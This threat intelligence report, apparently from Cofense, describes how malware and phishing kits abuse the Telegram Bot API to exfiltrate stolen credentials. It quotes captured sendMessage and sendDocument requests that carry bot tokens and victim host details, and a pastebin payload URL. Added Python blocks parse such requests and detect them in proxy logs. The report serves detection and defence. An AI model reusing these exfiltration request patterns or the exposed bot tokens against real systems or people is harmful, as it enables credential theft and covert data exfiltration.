By: Kahng An, Intelligence Team
Telegram is a free, online instant messenger platform that is also commonly abused by threat actors for a wide range of malicious activities. One of Telegram’s notable features is its extensive collection of web APIs, one of which is used to interact with automated bot accounts. Notably, Telegram bot accounts are still capable of posting messages in chats and uploading arbitrary files such as screenshots or archives of stolen information. As such, Telegram bots are often used by threat actors as a method of data exfiltration through a technically legitimate service. This report will provide an overview of how threat actors use the Telegram Bot API, examples of data exfiltration via Telegram bots within both malware and credential phishing samples, and how analysts can query the Telegram API to read bot messages.
Key Takeaways
- Telegram bots can be used as a Command and Control (C2) to exfiltrate data via text messages or arbitrary file uploads. The uploaded files within the analyzed samples usually include screenshots and text files with stolen credentials.
- 3.8% of all malware-based ATRs (Active Threat Reports) from Q1 2024 to Q2 2025 used Telegram as a C2.
- Note that ATRs track unique campaigns and can have multiple email samples that are associated with a singular campaign and its related IOCs (indicators of compromise).
- 2.3% of all credential phishing ATRs from Q1 2024 to Q2 2025 used Telegram as a C2.
- Threat investigators and analysts can use the Telegram API to read through bot messages if they can obtain the bot’s authentication token and the ID number for the chat room.
- Because threat actors must supply both of these in every Telegram Bot API call, obtaining them is usually trivial.
Telegram Bot API Overview
While Telegram is a commonly used messaging platform, it also provides a robust API for creating various automations via bot accounts. While Telegram intends bot accounts to be mostly for user interaction within a chat group, Telegram bots can be made to send arbitrary messages, upload arbitrary files, and download files from a specified chat group. As such, threat actors can abuse the API to exfiltrate text or file-based information from an infected host and issue further commands via Telegram messages to the bot, effectively using a Telegram group as a C2 server.
Notable Samples
Telegram bots can be used for data exfiltration or communication in a few different ways, and they are commonly used in various malware samples, including Remote Access Trojans (RATs), Keyloggers, and Information Stealers. While the way Telegram bots can be used varies between malware samples, some potential uses include sending scripted payloads to a group for a RAT to execute via a Telegram bot account, and using Keyloggers and Information Stealers to send keyboard inputs or stolen credentials to the threat actor’s Telegram group. In general, Telegram C2s appear to be most popular among Information Stealers, possibly due to Telegram’s technically legitimate nature and because Information Stealers typically only need to exfiltrate data passively rather than provide complex communications beyond simple message or file transfers.
Credential Phishing
The simplest way Telegram bots are utilized is to exfiltrate data from credential phishing forms to a bot created by the threat actor. The following image shows a credential phishing page that will exfiltrate input data via a “sendMessage” API call, which is used to send messages to a specified Telegram bot.

Figure 1: When the credential phishing form is submitted, the data will be exfiltrated via a Telegram bot.
When looking at the exact POST request, an analyst can note that the Telegram bot used to exfiltrate data has the bot ID “8164995813” in this example. The exfiltrated data is sent to chat room ID “6322326407” with the exfiltrated data sent as the message body.

Figure 2: The POST request to the Telegram C2 shows the bot’s ID and authentication token.

Figure 3: The body of the POST request includes the ID for the Telegram chat room to exfiltrate the data to.
Notably, when looking at the POST response confirming that the message was sent via the API, additional information can be found about the Telegram bot, including its display name (“bebetologxxz”), username (“bebetologxxz_bot”), and the name of the chat room where the data was exfiltrated to (“Mr Grace 247”).

Figure 4: The body of the POST response includes further information about the Telegram bot and chat room used to exfiltrate data.
Agent Tesla Keylogger
While Agent Tesla Keylogger is capable of exfiltrating data via a standard HTTP request, email, or FTP, it can also be configured to handle communication via Telegram messages. Typically, this involves using the API to upload files via the “sendDocument” API call, much as a credential phishing page would make a POST request to the “sendMessage” API endpoint. The following shows an example request.
hxxps[://]api[.]telegram[.]org/bot1900392974:AAEB_yGGlWksNcNC4Dg08OgUSlmDON2w098/sendDocument
These exfiltrated files are text documents or archives that include stolen credentials aggregated from browser cookies, email clients, and FTP clients. Agent Tesla Keylogger is by far the most prominent example of a malware family that uses Telegram as a C2, with 77.7% of all ATRs in 2024 with a Telegram C2 being an Agent Tesla Keylogger sample.
WSH RAT
While Telegram Bot API requests can be called from malicious files and script payloads, they can also be called within the browser. Some WSH RAT samples have been seen reporting host information to a Telegram C2 as a part of the initial payload download page. The Telegram messages include the infected host’s IP address, geographic region, city, country, and browser user-agent. In these cases, the WSH RAT sample is not responsible for interacting with Telegram APIs at all, and only the initial payload download page includes a Telegram Bot API call. While this use of a Telegram C2 is less common, it is a useful way for threat actors to be notified when a victim has downloaded a file. The following shows a sample POST request and response from this type of Telegram C2 use.
Request: POST hxxps[://]api[.]telegram[.]org/bot7004434365:AAGMJLpdyYvb4CDZLQ47zbh0pRB_CC-Hwro/sendMessage
{"chat_id":"7183381859","text":"Your file was downloaded from – Email: <redacted> IP Address: <redacted> Region: <redacted> City: <redacted> Country: United States User-Agent: <redacted>"}

Response: {"ok":true,"result":{"message_id":667,"from":{"id":7004434365,"is_bot":true,"first_name":"Downloads_Bot","username":"Downloads39_bot"},"chat":{"id":7183381859,"first_name":"Crazy","last_name":"Logz","username":"crazylogz","type":"private"},"date":1719586975,"text":"Your file was downloaded from – Email: <redacted> IP Address: <redacted> Region: <redacted> City: <redacted> Country: United States User-Agent: <redacted>","entities":[{"offset":39,"length":27,"type":"email"},{"offset":79,"length":13,"type":"url"}]}}
Pure Logs Stealer
Some early samples of Pure Logs Stealer associated with the Lone None threat actor use Telegram to exfiltrate stolen credentials and host information via bot messages. However, more recent samples have also creatively used Telegram user profiles as a way of providing second-stage URL payloads for a Telegram bot. The profile page for the bot includes a string that is used as the path for a temporary file hosting service that is used for malicious payloads. The following is an example of one of the Telegram bots used by Lone None to demonstrate how they embed the payload on the page.

Figure 5: An example of a Telegram bot profile used by Lone None to store part of a URL payload.
Typically, this part of the URL payload is then used to load a malicious Python script from paste[.]rs, an online pastebin service. The following is the combined URL payload from the above Telegram snippet.
hxxps[://]paste[.]rs/qDTxA
Investigating Telegram Bot Channels
Due to some interesting quirks of how the Telegram Bot API works, simply having a Telegram bot’s authorization token can provide high-fidelity IOCs for further investigation. The getMe method is intended for testing authorization tokens, but it notably outputs the bot’s username, which can be useful for attributing bots to certain threat actor groups. Even more notably, analysts can query the API to forward historical bot messages from the threat actor’s chat group to one controlled by the analyst using the getUpdates and forwardMessage methods. If the analyst can find the bot’s authorization token and the chat ID used by the threat actor, all prior messages sent by the bot can be forwarded to a group controlled by the analyst. Obtaining both is usually trivial, because every API request must specify the bot’s authorization token and the chat room ID it interacts with. Looking back at the network communication from the credential phishing example, the POST request URL includes the authorization token “bot8164995813:AAH85N7GqLCmFV8QF5STNJv92Cv2ZQKpPGk”. Similarly, the chat room ID can be found within the body of the POST request.

Figure 6: A bot’s authorization token can be found within the POST request URL.

Figure 7: The Telegram chat room that an API request interacts with can be found within the body of the POST request.
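The triage step described above, as an added example that is not code from the original report: recover the bot token and chat ID from a captured Bot API request, read the bot and chat identity out of the API response, and build the getMe/getUpdates URLs an analyst would query next. The sample exchange is constructed (modelled on the WSH RAT request/response shown earlier) and the token is a placeholder; the `TOKEN_RE` pattern and the JSON-or-form body handling are my assumptions about what a phishing kit or malware sample sends.

```python
import json
import re
from urllib.parse import parse_qs, urlparse

# Every Bot API URL has the form https://api.telegram.org/bot<id>:<secret>/<method>,
# so the full token is recoverable from the request path alone.
TOKEN_RE = re.compile(r"/bot(?P<bot_id>\d+):(?P<secret>[A-Za-z0-9_-]+)/(?P<method>\w+)")

def parse_request(url: str, body: str) -> dict:
    """Recover bot id, full token, API method and target chat_id from a captured request."""
    m = TOKEN_RE.search(urlparse(url).path)
    if not m:
        raise ValueError("not a Telegram Bot API request")
    try:  # JSON body (WSH RAT sample) or form-encoded body (phishing kit sample)
        params = json.loads(body)
    except json.JSONDecodeError:
        params = {k: v[0] for k, v in parse_qs(body).items()}
    return {"bot_id": m["bot_id"], "token": f"{m['bot_id']}:{m['secret']}",
            "method": m["method"], "chat_id": str(params.get("chat_id", ""))}

def parse_response(resp_json: str) -> dict:
    """Pull the bot and chat identity that the API echoes back in a successful reply."""
    resp = json.loads(resp_json)
    if not resp.get("ok"):
        return {}
    bot, chat = resp["result"].get("from", {}), resp["result"].get("chat", {})
    # Groups carry a title; private chats carry the recipient's first/last name instead.
    name = chat.get("title") or " ".join(
        p for p in (chat.get("first_name"), chat.get("last_name")) if p)
    return {"bot_username": bot.get("username"), "bot_name": bot.get("first_name"),
            "chat_id": str(chat.get("id", "")), "chat_type": chat.get("type"),
            "chat_name": name, "chat_username": chat.get("username")}

def pivot_urls(token: str) -> dict:
    """Endpoints an analyst queries next with the recovered token (getMe, then getUpdates)."""
    base = f"https://api.telegram.org/bot{token}"
    return {"getMe": f"{base}/getMe", "getUpdates": f"{base}/getUpdates"}

# Constructed sample exchange modelled on the WSH RAT request/response shown above;
# the token is a placeholder and the victim details are fictitious.
SAMPLE_URL = "https://api.telegram.org/bot1234567890:AAEXAMPLE-placeholder_token_0/sendMessage"
SAMPLE_BODY_JSON = '{"chat_id":"7183381859","text":"Your file was downloaded from - IP Address: 203.0.113.5"}'
SAMPLE_BODY_FORM = "chat_id=6322326407&text=Email%3A+victim%40example.com"
SAMPLE_RESPONSE = ('{"ok":true,"result":{"message_id":667,'
    '"from":{"id":1234567890,"is_bot":true,"first_name":"Downloads_Bot","username":"Downloads39_bot"},'
    '"chat":{"id":7183381859,"first_name":"Crazy","last_name":"Logz","username":"crazylogz","type":"private"},'
    '"date":1719586975,"text":"Your file was downloaded from - IP Address: 203.0.113.5"}}')
```

A mismatch between the request's chat_id and the response's chat id is worth noting in the case file, since it means the captured request and response were not the same exchange.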
Mitigations
Due to its flexibility and ease of use, the Telegram Bot API can be used on virtually any webpage or malicious program capable of making web requests. Some common ways threat actors use the Telegram API include directly making HTTPS requests from executing a malicious script, sending credential phishing form data upon submitting the form, or alerting the threat actor that a victim visited a malicious embedded link payload upon loading the site. In all these cases, the victim would still need to first interact with some kind of malicious infrastructure set up by a threat actor. In other words, the victim would need to have opened some sort of suspect message, embedded link payload, or malicious file. To minimize potential data exposure, users should be trained to avoid and report suspect messages, links, and attachments.
If Telegram bots are not legitimately used within an environment, also consider blocking Telegram Bot API requests, which are all served over “hxxps[://]api[.]telegram[.]org/bot<token>/METHOD_NAME” where “<token>” is the unique bot authentication token and “METHOD_NAME” is the API method. Some commonly used methods include “sendMessage” (used to send text messages), “sendDocument” (used to upload files up to 50 MB in size), and “getFile” (used to download remote files). Another approach would be to create rules for the entire “api[.]telegram[.]org/bot” API endpoint.
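A detection counterpart to the blocking advice above, added here as an example and not part of the original report: one pattern on the fixed “/bot<token>/METHOD_NAME” path shape flags every Bot API call in proxy logs, labels the method by how the samples in this report abuse it, and skips sanctioned bot IDs. The log line format and the sample lines are constructed, and the tokens are placeholders.

```python
import re

# Every Bot API call has the path shape /bot<id>:<secret>/<method>, so one pattern
# covers all methods; a rule on "api.telegram.org/bot" alone is the blanket block.
BOT_API_RE = re.compile(
    r"https?://api\.telegram\.org/bot(?P<bot_id>\d+):(?P<secret>[A-Za-z0-9_-]+)/(?P<method>\w+)"
)

# Risk labels for the methods most often seen in the samples discussed in this report.
METHOD_RISK = {
    "sendMessage": "text exfiltration",
    "sendDocument": "file exfiltration (up to 50 MB per upload)",
    "getFile": "remote file download",
    "getUpdates": "command polling",
}

def detect_bot_api(log_lines, allowlist=frozenset()):
    """Return one alert per proxy log line that calls the Telegram Bot API.

    Constructed log format (hypothetical): "<timestamp> <src_ip> <verb> <url> <status>".
    Bot IDs in `allowlist` are treated as sanctioned automation and skipped.
    Only the numeric bot id is kept; the secret half of the token is deliberately
    dropped so the alert store does not become a second copy of the credential.
    """
    alerts = []
    for line in log_lines:
        m = BOT_API_RE.search(line)
        if not m or m["bot_id"] in allowlist:
            continue
        fields = line.split()
        alerts.append({
            "timestamp": fields[0],
            "src_ip": fields[1],
            "bot_id": m["bot_id"],
            "method": m["method"],
            "risk": METHOD_RISK.get(m["method"], "other Bot API method"),
        })
    return alerts

# Constructed sample lines; tokens are placeholders, not real credentials.
SAMPLE_LOG = [
    "2025-06-01T12:00:01Z 10.0.0.12 POST https://api.telegram.org/bot1234567890:AAEXAMPLE-token_a/sendDocument 200",
    "2025-06-01T12:00:05Z 10.0.0.34 POST https://api.telegram.org/bot2222222222:AAEXAMPLE-token_b/sendMessage 200",
    "2025-06-01T12:00:09Z 10.0.0.12 GET https://api.telegram.org/bot1234567890:AAEXAMPLE-token_a/getFile 200",
    "2025-06-01T12:00:12Z 10.0.0.56 GET https://web.telegram.org/k/ 200",
]

if __name__ == "__main__":
    for alert in detect_bot_api(SAMPLE_LOG, allowlist={"2222222222"}):
        print(alert)
```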
As threat actors continue to leverage legitimate platforms like Telegram to quietly exfiltrate stolen credentials and sensitive data, security teams need visibility that goes beyond traditional detection methods. The tactics outlined above highlight how easily attackers can integrate services like the Telegram Bot API into phishing kits, keyloggers, and malware campaigns to streamline command-and-control and data exfiltration. Cofense helps organizations stay ahead of these evolving techniques by delivering actionable threat intelligence, real-time phishing insights, and detailed analysis of the infrastructure and tools adversaries use. Schedule a demo to see how Cofense Intelligence can strengthen your phishing defense strategy and provide the context your team needs to detect and disrupt modern threats: https://cofense.com/demo.